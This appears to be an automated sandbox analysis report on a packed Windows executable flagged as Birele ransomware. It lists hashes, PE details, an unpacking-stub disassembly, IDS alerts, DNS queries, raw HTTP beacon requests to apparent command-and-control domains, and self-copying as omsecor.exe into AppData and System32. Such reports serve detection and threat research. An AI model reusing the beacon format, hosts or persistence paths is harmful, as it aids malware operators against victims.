                        SHA256:8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72
                        SHA512:4768075e7c02683f09e9d23339b5a69724c3439c711244c7761f9ceaf44f7c4a6d8b1189ab47214e4aa4a27e1fad1f07b4be4d3d374c87326611fc68be378287
                        SSDEEP:1536:hnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:hGs8cd8eXlYairZYqMddH13q
                        TLSH:95A302CAC93DE0D9F0F9593945AFE54732BCEC17A198173B8BD8256CBD885D80A110F9
                        File Content Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....y.P.................p........................@..........................0................... ................................... .....................................................
                        Icon Hash:0305820181422513
                        Entrypoint:0x4210a8
                        Entrypoint Section:.MPRESS2
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x50AF79C4 [Fri Nov 23 13:27:32 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:850bf254c76e5c8effedc1f08eb6c411
                        Instruction
                        pushad
                        call 00007F163D54D525h
                        pop eax
                        add eax, 00000B5Ah
                        mov esi, dword ptr [eax]
                        add esi, eax
                        sub eax, eax
                        mov edi, esi
                        lodsw
                        shl eax, 0Ch
                        mov ecx, eax
                        push eax
                        lodsd
                        sub ecx, eax
                        add esi, ecx
                        mov ecx, eax
                        push edi
                        push ecx
                        dec ecx
                        mov al, byte ptr [ecx+edi+06h]
                        mov byte ptr [ecx+esi], al
                        jne 00007F163D54D518h
                        sub eax, eax
                        lodsb
                        mov ecx, eax
                        and cl, FFFFFFF0h
                        and al, 0Fh
                        shl ecx, 0Ch
                        mov ch, al
                        lodsb
                        or ecx, eax
                        push ecx
                        add cl, ch
                        mov ebp, FFFFFD00h
                        shl ebp, cl
                        pop ecx
                        pop eax
                        mov ebx, esp
                        lea esp, dword ptr [esp+ebp*2-00000E70h]
                        push ecx
                        sub ecx, ecx
                        push ecx
                        push ecx
                        mov ecx, esp
                        push ecx
                        mov dx, word ptr [edi]
                        shl edx, 0Ch
                        push edx
                        push edi
                        add ecx, 04h
                        push ecx
                        push eax
                        add ecx, 04h
                        push esi
                        push ecx
                        call 00007F163D54D583h
                        mov esp, ebx
                        pop esi
                        pop edx
                        sub eax, eax
                        mov dword ptr [edx+esi], eax
                        mov ah, 10h
                        sub edx, eax
                        sub ecx, ecx
                        cmp ecx, edx
                        jnc 00007F163D54D548h
                        mov ebx, ecx
                        lodsb
                        inc ecx
                        and al, FEh
                        cmp al, E8h
                        jne 00007F163D54D514h
                        inc ebx
                        add ecx, 04h
                        lodsd
                        or eax, eax
                        js 00007F163D54D528h
                        cmp eax, edx
                        jnc 00007F163D54D507h
                        jmp 00007F163D54D528h
                        add eax, ebx
                        js 00007F163D54D501h
                        add eax, edx
                        sub eax, ebx
                        mov dword ptr [esi-04h], eax
                        jmp 00007F163D54D4F8h
                        call 00007F163D54D525h
                        pop edi
                        add edi, FFFFFF4Dh
                        mov al, E9h
                        stosb
                        mov eax, 00000B56h
                        stosd
                        call 00007F163D54D525h
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x210000xa8.MPRESS2
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x798.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x2103c0x10.MPRESS2
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .MPRESS10x10000x200000x168003c05710d8e0f8b2c4b5195d41c97543dFalse1.000390625data7.998409371053569IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .MPRESS20x210000xc120xe0058ed9b290702b61b25d57f2eb0e1ef56False0.5131138392857143data6.0539393201204925IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x220000x7980x80008f85d44ed88a96e513482027c080e7cFalse0.34375data3.22496295890587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_BITMAP0xd1c00x131fcdataEnglishUnited States1.0004934210526315
                        RT_ICON0x220c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsEnglishUnited States0.19489247311827956
                        RT_STRING0x206a40x54emptyEnglishUnited States0
                        RT_GROUP_ICON0x224280x14dataEnglishUnited States1.2
                        RT_VERSION0x2247c0x284dataEnglishUnited States0.4922360248447205
                        RT_MANIFEST0x227400x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884
                        DLLImport
                        KERNEL32.DLLGetModuleHandleA, GetProcAddress
                        USER32.dllGetClassNameA
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-12-05T18:09:13.072527+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.750001193.166.255.17180TCP
                        2024-12-05T18:09:19.895177+01002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.749708193.166.255.17180TCP
                        2024-12-05T18:09:41.929645+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749708193.166.255.17180TCP
                        2024-12-05T18:10:04.071060+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749771193.166.255.17180TCP
                        2024-12-05T18:10:05.646999+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74982715.197.204.5680TCP
                        2024-12-05T18:10:07.719093+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74983352.34.198.22980TCP
                        2024-12-05T18:10:07.909220+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.749833TCP
                        2024-12-05T18:10:07.909220+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.749833TCP
                        2024-12-05T18:10:32.196627+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749844193.166.255.17180TCP
                        2024-12-05T18:10:54.384861+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749898193.166.255.17180TCP
                        2024-12-05T18:10:55.730671+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74995115.197.204.5680TCP
                        2024-12-05T18:10:57.327496+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74995552.34.198.22980TCP
                        2024-12-05T18:11:21.525774+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749963193.166.255.17180TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 5, 2024 18:09:19.895176888 CET4970880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:20.015081882 CET8049708193.166.255.171192.168.2.7
                        Dec 5, 2024 18:09:20.015182972 CET4970880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:20.022612095 CET4970880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:20.142782927 CET8049708193.166.255.171192.168.2.7
                        Dec 5, 2024 18:09:41.929482937 CET8049708193.166.255.171192.168.2.7
                        Dec 5, 2024 18:09:41.929645061 CET4970880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:41.930557013 CET4970880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:42.043328047 CET4977180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:42.050311089 CET8049708193.166.255.171192.168.2.7
                        Dec 5, 2024 18:09:42.163161993 CET8049771193.166.255.171192.168.2.7
                        Dec 5, 2024 18:09:42.163412094 CET4977180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:42.163638115 CET4977180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:09:42.283363104 CET8049771193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:04.070904970 CET8049771193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:04.071059942 CET4977180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:04.071096897 CET4977180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:04.191118002 CET8049771193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:04.421276093 CET4982780192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:04.541254997 CET804982715.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:04.541412115 CET4982780192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:04.541574955 CET4982780192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:04.662012100 CET804982715.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:05.646893978 CET804982715.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:05.646998882 CET4982780192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:06.236660957 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:06.356581926 CET804983352.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:06.356738091 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:06.357047081 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:06.477431059 CET804983352.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:07.718915939 CET804983352.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:07.719068050 CET804983352.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:07.719093084 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:07.719152927 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:07.789298058 CET4983380192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:07.909219980 CET804983352.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:08.695266962 CET4982780192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:10.162571907 CET4984480192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:10.282452106 CET8049844193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:10.282543898 CET4984480192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:10.282772064 CET4984480192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:10.402587891 CET8049844193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:32.196511984 CET8049844193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:32.196626902 CET4984480192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.196803093 CET4984480192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.316574097 CET8049844193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:32.365041971 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.485018015 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:32.485133886 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.546143055 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.666019917 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.384713888 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.384860992 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:54.384974957 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:54.500397921 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.504889011 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.620868921 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:54.621009111 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.621197939 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.741923094 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:55.730530977 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:55.730670929 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:55.843384027 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:55.963144064 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:55.963241100 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:55.963536978 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:56.086004019 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.327356100 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.327496052 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.328866005 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.328933001 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.328969002 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.448900938 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.560251951 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:59.493081093 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.613873005 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:59.614020109 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.614279985 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.734798908 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.525563002 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.525774002 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.525877953 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.637634039 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.646197081 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.757520914 CET8050001193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.757687092 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.757900000 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.877674103 CET8050001193.166.255.171192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 5, 2024 18:09:19.644263029 CET6343253192.168.2.71.1.1.1
                        Dec 5, 2024 18:09:19.878498077 CET53634321.1.1.1192.168.2.7
                        Dec 5, 2024 18:10:04.185692072 CET4919253192.168.2.71.1.1.1
                        Dec 5, 2024 18:10:04.420393944 CET53491921.1.1.1192.168.2.7
                        Dec 5, 2024 18:10:05.764008999 CET5960553192.168.2.71.1.1.1
                        Dec 5, 2024 18:10:06.235613108 CET53596051.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 5, 2024 18:09:19.644263029 CET192.168.2.71.1.1.10x8d43Standard query (0)lousta.netA (IP address)IN (0x0001)false
                        Dec 5, 2024 18:10:04.185692072 CET192.168.2.71.1.1.10x8357Standard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
                        Dec 5, 2024 18:10:05.764008999 CET192.168.2.71.1.1.10xdf48Standard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 5, 2024 18:09:15.006210089 CET1.1.1.1192.168.2.70x2eb6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                        Dec 5, 2024 18:09:15.006210089 CET1.1.1.1192.168.2.70x2eb6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                        Dec 5, 2024 18:09:19.878498077 CET1.1.1.1192.168.2.70x8d43No error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
                        Dec 5, 2024 18:10:04.420393944 CET1.1.1.1192.168.2.70x8357No error (0)mkkuei4kdsz.com15.197.204.56A (IP address)IN (0x0001)false
                        Dec 5, 2024 18:10:04.420393944 CET1.1.1.1192.168.2.70x8357No error (0)mkkuei4kdsz.com3.33.243.145A (IP address)IN (0x0001)false
                        Dec 5, 2024 18:10:06.235613108 CET1.1.1.1192.168.2.70xdf48No error (0)ow5dirasuek.com52.34.198.229A (IP address)IN (0x0001)false
                        • lousta.net
                        • mkkuei4kdsz.com
                        • ow5dirasuek.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749708193.166.255.171807452C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:09:20.022612095 CET186OUTGET /370/988.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.749771193.166.255.171807452C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:09:42.163638115 CET186OUTGET /400/589.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.74982715.197.204.56807452C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:04.541574955 CET191OUTGET /931/166.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: mkkuei4kdsz.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:05.646893978 CET259INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Thu, 05 Dec 2024 17:10:05 GMT
                        Content-Type: text/html
                        Content-Length: 114
                        Connection: keep-alive
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.74983352.34.198.229807452C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:06.357047081 CET191OUTGET /612/675.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: ow5dirasuek.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:07.718915939 CET415INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 05 Dec 2024 17:10:07 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.749844193.166.255.17180396C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:10.282772064 CET186OUTGET /206/582.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.749898193.166.255.17180396C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:32.546143055 CET186OUTGET /861/856.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.74995115.197.204.5680396C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:54.621197939 CET191OUTGET /441/819.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: mkkuei4kdsz.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:55.730530977 CET259INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Thu, 05 Dec 2024 17:10:55 GMT
                        Content-Type: text/html
                        Content-Length: 114
                        Connection: keep-alive
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.74995552.34.198.22980396C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:55.963536978 CET298OUTGET /358/336.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: ow5dirasuek.com
                        Connection: Keep-Alive
                        Cookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
                        Dec 5, 2024 18:10:57.327356100 CET338INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 05 Dec 2024 17:10:57 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418657|1733418607|25|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.749963193.166.255.171807296C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:10:59.614279985 CET186OUTGET /349/212.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.750001193.166.255.171807296C:\Users\user\AppData\Roaming\omsecor.exe
                        TimestampBytes transferredDirectionData
                        Dec 5, 2024 18:11:21.757900000 CET186OUTGET /952/351.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:12:09:15
                        Start date:05/12/2024
                        Path:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\fmlgbgc2p5.exe"
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:809D8BEDB2DA450B588BF82E9A118FE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:809D8BEDB2DA450B588BF82E9A118FE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:6E897A612472AD8B51062A6844A8A17B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:6E897A612472AD8B51062A6844A8A17B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:12:10:07
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:678D56882701DBE0727C09DD075B56D1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:14
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:678D56882701DBE0727C09DD075B56D1
